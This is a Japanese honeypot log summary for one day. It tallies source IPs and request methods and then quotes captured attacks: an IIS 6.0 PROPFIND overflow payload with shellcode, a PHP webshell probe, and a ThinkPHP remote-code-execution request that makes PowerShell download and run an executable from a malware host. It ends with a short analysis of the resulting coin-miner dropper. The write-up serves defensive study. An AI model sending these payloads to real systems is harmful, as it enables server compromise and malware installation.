■2019-04-03のアクセス数は555件でした。
■送信元IPアドレスの数は 52件です。
■メソッドの種別は以下です。
GET・・504件 PUT・・0件 POST・・49件 HEAD・・1件 CONNECT・・0件 PROFFIND・・1件 その他・・0件
■送信元ipアドレスの一覧と件数は以下となります。
182.61.171.45・・・2件
61.160.236.77・・・16件
50.249.177.14・・・1件
180.247.183.11・・・1件
88.247.206.25・・・1件
71.6.232.4・・・1件
143.202.188.3・・・1件
85.99.106.24・・・1件
188.163.16.57・・・1件
45.242.220.21・・・1件
119.29.85.12・・・1件
88.247.83.15・・・1件
78.189.117.12・・・1件
94.141.169.68・・・1件
79.174.24.72・・・1件
4.34.201.34・・・280件
66.102.6.49・・・1件
103.80.117.11・・・1件
95.170.113.18・・・1件
189.162.250.19・・・1件
112.66.184.231・・・3件
186.192.16.18・・・1件
184.105.139.67・・・1件
181.224.255.50・・・1件
103.113.107.4・・・1件
95.133.53.21・・・1件
196.52.43.57・・・1件
176.103.74.11・・・1件
172.104.108.10・・・1件
83.148.239.21・・・1件
193.240.245.22・・・7件
92.118.161.53・・・1件
88.250.159.23・・・1件
107.170.237.22・・・1件
61.219.11.15・・・1件
179.213.132.11・・・1件
124.158.168.19・・・1件
194.114.129.21・・・1件
85.101.11.21・・・1件
93.51.240.14・・・1件
13.232.7.103・・・200件
193.107.228.22・・・1件
223.105.4.25・・・2件
162.243.145.24・・・1件
103.90.205.30・・・1件
187.74.193.25・・・1件
198.108.66.24・・・1件
216.245.197.25・・・1件
92.118.160.41・・・1件
5.160.128.71・・・1件
46.183.122.12・・・1件
78.163.225.16・・・1件
気になるlog
12件目。IIS6.0の脆弱性をねらった攻撃。
[2019-04-03 02:56:22+0900] 13.232.7.103 localhost:80 "PROPFIND / HTTP/1.1" 200 1022 PROPFIND / HTTP/1.1 Host: localhost Connection: Close Content-Length: 0 If: =?utf-8?b?PGh0dHA6Ly9sb2NhbGhvc3QvYWFhYWFhYcOmwr3CqMOnwqHCo8Onwp3CocOnwoTCs8OmwqTCtsOkwp3CssOnwqjCucOkwq3Ct8Okwr3CsMOnwpXCk8OnwqnCj8OkwqHCqMOlwpnCo8OmwrXClMOmwqE=?= ã¥å¬å§æ£ã¤ä°ç¡ æ¥å±ä±æ©çä±çµå¡ã¤æ±ã¹åªå´åçå¡ã²æµæ°´ãæãå ¡å¡¢ä³åã°ç桪ã´ä¹ç¡«ä¥¶ä¹³ä±ªåºæ½±å¡ã°ã®äåä¡£æ½ççµæ¯ç¨äå°ç¨¶ææç橲穫ç¢çææ±ãæ±¹åå¢å³ã·æ©·ä ã´æ¶äµå䬿ç²ç¸å©ä¸æ²å¨°å¤¸åÈÈáæ æ±å䬷æ±ä½å¡ç¥ä¥ªå¡ä©ä æáæ ä ´æ±æ½æ¹¦çä¬áæ åæ©çã°å¡¦äçæå ³ç¥ç©ä©¬> (Not <locktoken:write1>) <http://localhost/bbbbbbbç¥æ µä½æ½§æ¯ä¡ ãæµä³ã¡±å¥å©¢åµå¡æ¥æ©å ã¡å¥æä¥±ä¤æ²ã¨äç ¹ã«ææµåç©ã±æ½ç奿½¯çãæ ¨ç©²ã äµååä°¸ãºã²æ¦æ¹ä¡ãæ ·äµæ ´ä³ä¥å²æµ©ã±ä¹¤æ¸¹ææ¤å 估硯çæäç©£ç¹ä½äæ¼¶ç¹æ¡·ç©æ ã¥ ã¹æ°¹ä±ã²å¥å¡äç©æ°µå©ææ¹²æ±å¥å³ã å¡¥å¥ç ã¶å·äå¡áæ æ¹æ æ¹æ äçªáæ ää½´å¥å´ä¦äç¤ç¡¯ææ åµçºçºäµäåëæ ã ¶æ¹¯â£æ á æ Ìç¿¾ï¿¿ï¿¿áæ Ñ®æ ç ®ç°á´æ â§§æ éæ ã¤±æ®ä¥ãå«ç«çç¥¡áæ æ¸ æ ç²ç¥¨äµ©ã¬ä¨äµ°èæ ä¡·ãá¶ªæ æ½ªäµá¸æ â§§æ VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB9lk8sYkPkPypC0CY7uNQfr1TdKNrP0TKPRlLDKaBMDtKqbkxjoh70JNFP1yoP17PDlMls1QlYrnLmP7QXOlMZaI7K2hp22Nw4KqBjpBk12oLKQJ02kq03HE5WPQdOZm18PB0tKMxlXbk0XO0m1j3zCml0IrkLt2kiqxVnQYo01upvLva6ojmyqfgLxyPd5Xt9sQmHxoKqmLdSExbnxBk1Ho49qXSC6rkjlpK2kb8mLja8SDKjdDKKQ6pu90DmTNDaKqKOq1IPZr19ogpOhOo0ZtKzrXksVomqXPnc5qdm0ph1g2IPn0i2iJFR40hPLsGKvIwIoz5P1ioNwaGnw0WofRHnZofSIuWioJ5XkOpQKlqy921nqPjkSoanqrJPPr3r0Ph27ayCoev9oYEXk0OqImaFrNrBHkPp2aPtDNrNrB2r10Rb0S8hknunNoKkOZ5E96faZjp1KRHaplsipKPQygprJm4R0BJkoNvrHQenfeNTFIoiE019oogogNw27QF2HNMjfJxsKkOIEbeupqeMVNkZordu3kPM09pHkXQwyVDYpKPKPK8fLyoKOyonOpibMpa1W2Ed3NO1Qc2RCnONdpLnN0pS82PkPXkRKMay0Oo20BJm20jm2B01ZYrpjM20Wc88ZYfYJpO9o6u63MawP2FfXkTm3O9i4r4BmnlO4m8ma90vTLC2021ofc8LRV62iiRYoYEReEpqdLmNxu5EprTJvqZm0OdR0bmoTo4jl0Pb3bHLm1GFN1Kiovuu3JL9tHkXNpSc8FfRvqwnryoWeRJYpqGbHlq2kBOqwiovuaZkPBHXpee3rqFIo9EXhdPIoyo9oMsmjnOnOnrS5RC1ic3RLbE0rloloBS2VOsph2O2SsDlns51hPeIphhIbKNioKOp109OBLnmaP4mdlnP105P0nNNQoHLxkPAA>
13.232.7.103からの200件はphpのwebshell設置の調査だった。
postで以下のような文字列が含まれていた。webshellに関しての調査でdie()関数を実行している。
[2019-04-03 08:00:19+0900] 13.232.7.103 ほげ:80 "POST /xx.php HTTP/1.1" 200 False POST /xx.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Host: ほげ Content-Length: 21 Connection: Keep-Alive Cache-Control: no-cache axa=die(@md5(M4rch));
248件目。遂にhuntinglog第一号となるアクセスが。あとで解析しよう。
[2019-04-03 10:07:04+0900] 112.66.184.231 ほげ:8080 "GET /public/index.php? GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se[/]download.exe','C:/Windows/temp/jamabvipleovhlf20037.exe');start%20C:/Windows/temp/jamabvipleovhlf20037.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: zh-cn Referer: http://ほげ:8080/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se[/]download.exe','C:/Windows/temp/jamabvipleovhlf20037.exe');start C:/Windows/temp/jamabvipleovhlf20037.exe User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 133.167.108.152:8080
4.34.201.34の280件はパスワードリスト攻撃だった。
248件目の解析(download.exe)
表層解析
virustotal 52/66
d233335ee3810e1df0bcc768c283a122b2fbf7c322205098ccef1627be9b4e5d
Coinminer.Win32.MALXMR.TIAOODBVとか参考になりそう、あとはダウンローダー系が目立つ。
UPXでパック、外部通信するライブラリ、C++、
まぁダウンローダーだろうな。
初めてFlARE-VMで動かしてみる・・ノイズ多いなぁ
ファイルは以下
%LocalAppData%\Local\Temp\wercplshost.exe (ダウンロード)
%LocalAppData%\Temp\nmbsawer.exe (多分ドロップ)
NW通信は以下
[Full request URI: http://fid.hognoob.se/wercplshost.exe]
q1a.hognoob.se
%LocalAppData%\Local\Temp\wercplshost.exe
生成されたファイルをみると、以下の文字列
C:\Users\Andy\Documents\Visual Studio 2010\Projects\HServer2_OpenSSLFork\Release\FakeServerMiniProgram.pdb
実行すると・・

なるほど。オリジナルを取ってくる。
3.9MBあった!コインマイナーくさい
sha256,9AC977087C08FACE38D8993DB5CC26048F68D412243216887A61130D95150988
virustotal 53/67
mimikatzとか出てる。
で、また、UPX。(flara-VMにUPXがみつからない。)
unpackしてみると.dataが5MBも!みてみると、まるわかりのドロッパーだった。

こいつがnmbsawer.exeになるんだろうな。
というか、丸見えです。

挑発してUPXにしているのではなく、本当に難読化したかったつもりだったんだろうか、圧縮したかっただけなのか・・
よし、解析は辞めようw
おそらくコインマイナーを頑張ってばらまこうとしているんじゃないかな?
あとはsandboxでいいや。
結果↓ コインマイナーのタグついてるね。nmbsawer.exeが出てないのが気になる。。